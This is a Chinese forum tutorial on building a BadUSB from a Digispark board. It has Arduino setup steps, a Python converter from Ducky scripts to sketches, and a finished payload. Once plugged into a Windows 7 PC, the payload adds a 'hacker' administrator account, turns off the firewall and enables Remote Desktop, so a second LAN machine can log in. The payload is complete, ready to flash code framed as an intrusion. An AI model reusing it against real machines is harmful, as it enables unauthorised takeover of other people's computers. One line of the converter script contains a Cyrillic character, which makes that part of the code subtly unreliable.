用户
搜索
  • TA的每日心情
    开心
    2019-1-5 10:44
  • 签到天数: 2 天

    连续签到: 1 天

    [LV.1]初来乍到

    i春秋作家

    Rank: 7Rank: 7Rank: 7

    8

    主题

    9

    帖子

    181

    魔法币
    收听
    0
    粉丝
    0
    注册时间
    2018-4-2

    i春秋签约作者

    发表于 2019-10-4 10:12:15 0790
    BadUSB简介

    吾旧友,拾U盘,彼异之,插PC,遂上线。 这个愚蠢精彩故事不禁让我萌生学习制作一个BadUSB的想法,为了贴合实际,特地从某宝入手了一个BadUSB板,如下图所示。


    简单来说,通过硬件直接插入对方电脑,让对方电脑执行代码,达到控制主机或者窃取信息等目的(需要自行发挥想象)
    准备工具
    一个BadUSB_Rubber_Ducky(橡皮鸭)

    Arduino的IDE - 下载地址:(https://www.arduino.cc/en/Main/Software)

    DPinst64驱动(根据电脑型号来,普遍都是64位操作系统)
    安装工具
    Arduino的安装就不讲了,傻瓜式安装:安装包 - 下一步 - 完成!

    DPinst64驱动安装的时候要选择始终信任来自Digistump LLC - 安装 - 下一步 - 完成!


    Arduino环境配置
    首先打开Arduino - 文件 - 首选项 - 附加开发板管理器网址:
    http://digistump.com/package_digistump_index.json

    在工具 - 开发板管理器 - 先等待它下载完文件:


    接着在类型下拉菜单里有一个贡献然后选择Digistump_AVR安装完毕就Ok


    最后选择开发板对应的开发板型号和编程器然后选择Keyboard一个模板:


    代码编写
    这是它示例的代码:
    #include "DigiKeyboard.h"

    void setup() {
      // don't need to set anything up to use DigiKeyboard
    }


    void loop() {
      // this is generally not necessary but with some older systems it seems to
      // prevent missing the first character after a delay:
      DigiKeyboard.sendKeyStroke(0);
      
      // Type out this string letter by letter on the computer (assumes US-style
      // keyboard)
      DigiKeyboard.println("Hello Power_Liu");
      
      // It's better to use DigiKeyboard.delay() over the regular Arduino delay()
      // if doing keyboard stuff because it keeps talking to the computer to make
      // sure the computer knows the keyboard is alive and connected
      DigiKeyboard.delay(5000);
    }

    上传烧录:
    提示:Running Digispark Uploader…Plug in device now… (will timeout in 60 seconds)
    这个时候需要60s的时间插入你的BadUSB:


    提示 : Micronucleus done. Thank you! 说明已经上传成功!这个时候插入BadUSB它会一直输入Hello Power_Liu直到拔掉为止:

    手把手教你写一个”Hello Hacker!”
    1、先在记事本中写好我们的代码 - 另存为 hacker.txt:
    //这个代码的意思就是打开cmd,然后输出Hello Hacker!
    DELAY 5000
    GUI r
    DELAY 500
    STRING cmd
    DELAY 500
    ENTER
    ENTER
    DELAY 1000
    STRING Hello Hacker!
    DELAY 1500
    ENTER
    ENTER
    2、使用我们的Python转换脚本吧hacker.txt转换为ino文件:

    Duckyspark_translator.py hacker.txt hacker
    Python转换脚本源代码:

    # -*- coding:utf-8 -*-

    from __future__ import print_function
    import sys

    payload_input = ''
    l='//'
    mod_input=''
    mod_output=''

    def replacement():
            print ('DigiKeyboard.', end ='')
            print(
    str(l.replace(' a', 'KEY_A').replace(' a ', 'KEY_A')
    .replace(' b', 'KEY_B')
    .replace(' c', 'KEY_C')
    .replace(' d', 'KEY_D')
    .replace(' e', 'KEY_E')
    .replace(' f', 'KEY_F')
    .replace(' g', 'KEY_G')
    .replace(' h', 'KEY_H')
    .replace(' i', 'KEY_I')
    .replace(' j', 'KEY_J')
    .replace(' k', 'KEY_K')
    .replace(' l', 'KEY_L')
    .replace(' m', 'KEY_M')
    .replace(' n', 'KEY_N')
    .replace(' o', 'KEY_O')
    .replace(' p', 'KEY_P')
    .replace(' q', 'KEY_Q')
    .replace(' r', 'KEY_R')
    .replace(' s', 'KEY_S')
    .replace(' t', 'KEY_T')
    .replace(' u', 'KEY_U')
    .replace(' v', 'KEY_V')
    .replace(' w', 'KEY_W')
    .replace(' x', 'KEY_X')
    .replace(' y', 'KEY_Y')
    .replace(' z', 'KEY_Z')

    #1-0 if needed

    #f1-f12
    .replace(' F1','KEY_F1')
    .replace(' F2','KEY_F2')
    .replace(' F3','KEY_F3')
    .replace(' F4','KEY_F4')
    .replace(' F5','KEY_F5')
    .replace(' F6','KEY_F6')
    .replace(' F7','KEY_F7')
    .replace(' F8','KEY_F8')
    .replace(' F9','KEY_F9')
    .replace(' F10','KEY_F10')
    .replace(' F11','KEY_F11')
    .replace(' F12','KEY_F12')
    #arrows
    .replace('LEFTARROW', 'KEY_ARROW_LEFT')
    .replace('RIGHTARROW', 'KEY_ARROW_RIGHT')
    .replace('UPARROW','KEY_ARROW_UP')
    .replace('DOWNARROW','KEY_ARROW_DOWN')
    .replace('LEFT', 'KEY_ARROW_LEFT')
    .replace('RIGH', 'KEY_ARROW_RIGHT')
    .replace('UP','KEY_ARROW_UP')
    .replace('DOWN','KEY_ARROW_DOWN')
    #keys
    .replace('PRINTSCREEN','sendKeyStroke(KEY_PRT_SCR' )
    .replace('TAB', 'sendKeyStroke(KEY_TAB')
    .replace('SPACE', 'sendKeyStroke(KEY_SPACE')
    .replace('CONTROL ALT','sendKeyStroke(MOD_ALT_RIGHT,')
    .replace('CTRL ALT','sendKeyStroke(MOD_ALT_RIGHT,')
    .replace('ESCAPE','sendKeyStroke(KEY_ESC' )
    .replace('ENTER','sendKeyStroke(KEY_ENTER')),end = '')
            print(');')

    def modreplacement():
            print ('DigiKeyboard.', end ='')
            print('sendKeyStroke(', end = '')

            print(
    str(l.replace (mod_input, '').replace(' a', 'KEY_A').replace(' a ', 'KEY_A')
    .replace(' b', 'KEY_B')
    .replace(' c', 'KEY_С')
    .replace(' d', 'KEY_D')
    .replace(' e', 'KEY_E')
    .replace(' f', 'KEY_F')
    .replace(' g', 'KEY_G')
    .replace(' h', 'KEY_H')
    .replace(' i', 'KEY_I')
    .replace(' j', 'KEY_J')
    .replace(' k', 'KEY_K')
    .replace(' l', 'KEY_L')
    .replace(' m', 'KEY_M')
    .replace(' n', 'KEY_N')
    .replace(' o', 'KEY_O')
    .replace(' p', 'KEY_P')
    .replace(' q', 'KEY_Q')
    .replace(' r', 'KEY_R')
    .replace(' s', 'KEY_S')
    .replace(' t', 'KEY_T')
    .replace(' u', 'KEY_U')
    .replace(' v', 'KEY_V')
    .replace(' w', 'KEY_W')
    .replace(' x', 'KEY_X')
    .replace(' y', 'KEY_Y')
    .replace(' z', 'KEY_Z')

    #1-0

    #f1-f12
    .replace(' F1','KEY_F1')
    .replace(' F2','KEY_F2')
    .replace(' F3','KEY_F3')
    .replace(' F4','KEY_F4')
    .replace(' F5','KEY_F5')
    .replace(' F6','KEY_F6')
    .replace(' F7','KEY_F7')
    .replace(' F8','KEY_F8')
    .replace(' F9','KEY_F9')
    .replace(' F10','KEY_F10')
    .replace(' F11','KEY_F11')
    .replace(' F12','KEY_F12')

    #arrows
    .replace('LEFTARROW', 'KEY_ARROW_LEFT')
    .replace('RIGHTARROW', 'KEY_ARROW_RIGHT')
    .replace('UPARROW','KEY_ARROW_UP')
    .replace('DOWNARROW','KEY_ARROW_DOWN')
    .replace('LEFT', 'KEY_ARROW_LEFT')
    .replace('RIGH', 'KEY_ARROW_RIGHT')
    .replace('UP','KEY_ARROW_UP')
    .replace('DOWN','KEY_ARROW_DOWN')

    .replace('PRINTSCREEN','sendKeyStroke(KEY_PRT_SCR' )
    .replace('TAB', 'sendKeyStroke(KEY_TAB')
    .replace('ESCAPE','KEY_ESC' )
    .replace('SPACE', 'KEY_SPACE')
    .replace(' ','')
    .replace('ENTER','KEY_ENTER')),end = '')

            print(','+mod_output, end = '')                               
            print(');')


    #arguments
    if len(sys.argv) == 2:
            try:
                    payload_input = open(sys.argv[1], "r")
                    sys.stdout = open("digipayload.ino", "w")
                    z = len(open(sys.argv[1], "r").readlines())
            except IOError:
                    print('\nError! File "'+sys.argv[1]+'" does not exist!\n' )
                    exit()
    elif len(sys.argv) == 3:
            try:
                    payload_input = open(sys.argv[1], "r")
                    sys.stdout = open(sys.argv[2]+'.ino', 'w')
                    z = len(open(sys.argv[1], "r").readlines())
            except IOError:
                    print('\nError!, File "'+sys.argv[1]+'" does not exist!\n' )
                    exit()
    elif len(sys.argv) > 3:
            print('Too much Arguments')
            exit()
    else:       
            payload_input = open('payload.txt', "r")
            sys.stdout = open("digipayload.ino", "w")
            z = len(open('payload.txt', "r").readlines())

    #--------------------------------------
    #Digispark program fragment
    print('//www.liuwx.cn&Qq211124332')
    print('#include "DigiKeyboard.h"')
    print('#define KEY_ESC     41')
    print('#define KEY_BACKSPACE 42')
    print('#define KEY_TAB     43')
    print('#define KEY_PRT_SCR 70')
    print('#define KEY_DELETE  76\n')

    print('void setup() {\n')
    print('DigiKeyboard.delay(5000);') #windows mozhet dolgo raspoznavat digispark potomu bylo resheno dobavlyat 5 sek delay vmesto 0.5sek
    print('DigiKeyboard.sendKeyStroke(0);')
    #---------------------------------------

    for i in range(z):
            l = payload_input.readline().replace('\n', '')
           
            if len (l) < 1:
                    print('', end = '')

            else:

                    if 'REM' in l:
                            print ('//', l)       
                   
                    else:
                            if 'DELAY' in l:
                                    print ('DigiKeyboard.', end = '')
                                    print (l.replace('DELAY', 'delay(').replace(' ',''), end = '')
                                    print(');')
                                                   
                            elif 'STRING' in l:
                                    print ('DigiKeyboard.', end = '')
                                    print (l.replace('"', '")); DigiKeyboard.print(char(34)); DigiKeyboard.print(F("')
                                           .replace('\\', '")); DigiKeyboard.print(char(92)); DigiKeyboard.print(F("')
                                           .replace('STRING ','print(F("'), end = '')
                                    print ('")', end = '')
                                    print(');');
                                   
                            elif (l == 'GUI') or (l == 'WINDOWS') or (l == 'CONTROL ESCAPE'):
                                    print('DigiKeyboard.sendKeyStroke(KEY_ESC,MOD_CONTROL_LEFT);')

                            elif (l == 'GUI d') or (l == 'WINDOWS d'):
                                    print ('DigiKeyboard.sendKeyStroke(KEY_D,MOD_GUI_LEFT);')
                           
                            elif (l == 'WINDOWS r') or (l == 'GUI r'):
                                    print ('DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);')

                            elif 'MENU' in l:
                                    print ('DigiKeyboard.sendKeyStroke(MOD_GUI_RIGHT);')
                                   
                    #!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!INVERCE!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!       
                            elif 'CTRL ALT' in l:
                                    replacement()
                            elif 'ALT' in l:
                                    mod_input = 'ALT'
                                    mod_output = 'MOD_ALT_RIGHT'
                                    modreplacement()
                            elif 'CTRL' in l:
                                    mod_input = 'CTRL'
                                    mod_output = 'MOD_CONTROL_LEFT'
                                    modreplacement()

                            elif 'CONTROL' in l:
                                    mod_input = 'CONTROL'
                                    mod_output = 'MOD_CONTROL_LEFT'
                                    modreplacement()

                    #!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!               
                            else:
                                    replacement()

                    if len(l) <1:
                            print('', end = '')
    #Digispark program fragment
    print('\n}')
    print('\n')
    print('void loop() {\n')
    print('}\n')
    #-----------------------------------

    payload_input.close()
    转换完成后再当前目录下会有一个hacker.ino文件:


    打开后的代码是这样的:

    //www.liuwx.cn&Qq211124332
    #include "DigiKeyboard.h"
    #define KEY_ESC     41
    #define KEY_BACKSPACE 42
    #define KEY_TAB     43
    #define KEY_PRT_SCR 70
    #define KEY_DELETE  76

    void setup() {

    DigiKeyboard.delay(5000);
    DigiKeyboard.sendKeyStroke(0);
    DigiKeyboard.delay(5000);
    DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);
    DigiKeyboard.delay(500);
    DigiKeyboard.print(F("cmd"));
    DigiKeyboard.delay(500);
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(1000);
    DigiKeyboard.print(F("Hello Hacker!"));
    DigiKeyboard.delay(1500);
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.sendKeyStroke(KEY_ENTER);

    }


    void loop() {

    }
    3、上传脚本 - 插入BadUSB进行烧录程序:


    上传成功后,它会自动执行我们的操作:会在屏幕上输出Hello Hacker!

    插上U盘入侵局域网Win7登陆它的远程桌面
    本来想写MSF + BadUSB 反弹Win7和Win10的Shell,但是百度上有了,我就没必要写在这篇文章了!
    思路和主要步骤
    1、在局域网中有一台PC-Win7系统

    2、插上BadUSB关掉Win7的防火墙

    3、创建一个HACKER的用户并提权为超级管理员

    4、开启Win7的3389

    5、局域网另一台电脑mstsc登陆Win7的桌面
    命令注释
    关闭防火墙的命令:netsh firewall set opmode mode=disable

    打开Win7的3389命令:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

    至于我为什么会吧上面这条开3389的命令有些字母是大写又有些字母是小写:

    reg add hklm\\system\\cURRENTcONTROLsET\\cONTROL\\tERMINAL\" \"sERVER /V FdENYtscONNECTIONS /T reg_dword /D 0 /F

    因为插入BadUSB会首先按下我们的大写锁定!然后才执行命令,因为怕有的电脑有中午输入法!所以我上面的语句要这样写!他会吧小写的在DOS窗口输出为大写,大写的命令会输出为小写!

    按下回车键:DigiKeyboard.sendKeyStroke(KEY_ENTER);

    延迟2秒执行(有的时候延迟时间短了会执行失败):DigiKeyboard.delay(2000);
    附上代码如下:
    //www.liuwx.cn QQ211124332

    #include "DigiKeyboard.h"
    #define KEY_ESC     41
    #define KEY_BACKSPACE 42
    #define KEY_TAB     43
    #define KEY_PRT_SCR 70
    #define KEY_DELETE  76
    #define KEY_CAPS_LOCK  0x39

    void setup() {

    DigiKeyboard.delay(2000);
    DigiKeyboard.sendKeyStroke(0);
    DigiKeyboard.delay(2000);
    DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);
    DigiKeyboard.sendKeyStroke(KEY_CAPS_LOCK);
    DigiKeyboard.delay(500);
    DigiKeyboard.print(F("cmd"));
    DigiKeyboard.delay(500);
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(1000);
    DigiKeyboard.print(F("color c"));
    DigiKeyboard.delay(500);
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(200);
    DigiKeyboard.print(F("net user hacker Qliuwx123@ /add"));
    DigiKeyboard.delay(1000);
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(300);
    DigiKeyboard.print(F("net localgroup administrators hacker /add"));
    DigiKeyboard.delay(1000);
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.print(F("netsh firewall set opmode mode=disable")); //关闭防火墙
    DigiKeyboard.delay(1000);
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(1000);
    DigiKeyboard.print(F("reg add hklm\\system\\cURRENTcONTROLsET\\cONTROL\\tERMINAL\" \"sERVER /V FdENYtscONNECTIONS /T reg_dword /D 0 /F"));  //开3389
    DigiKeyboard.delay(1000);
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.sendKeyStroke(KEY_ENTER);




    }


    void loop() {

    }
    具体演示的效果我放到了B站上:

    结尾
    这篇文章更多的是让自己对Arduino以及硬件方面的知识有一个初步的认识及为了以后更深入的去学习,初识Arduino Rubber_Ducky,有什么不足的欢迎大佬加我Q告诉我,我好改正!

    Q211124332
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册